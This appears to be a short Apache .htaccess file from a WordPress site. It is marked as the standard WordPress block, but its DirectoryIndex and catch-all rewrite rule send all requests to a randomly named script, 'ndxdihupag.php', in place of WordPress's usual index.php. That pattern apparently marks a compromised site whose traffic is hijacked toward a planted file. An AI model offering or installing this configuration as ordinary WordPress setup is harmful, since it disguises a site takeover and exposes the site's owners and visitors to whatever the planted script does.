# BEGIN WordPress
<IfModule mod_rewrite.c>

DirectoryIndex ndxdihupag.php
RewriteEngine On
RewriteBase /
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /ndxdihupag.php [L]

</IfModule>

# END WordPress


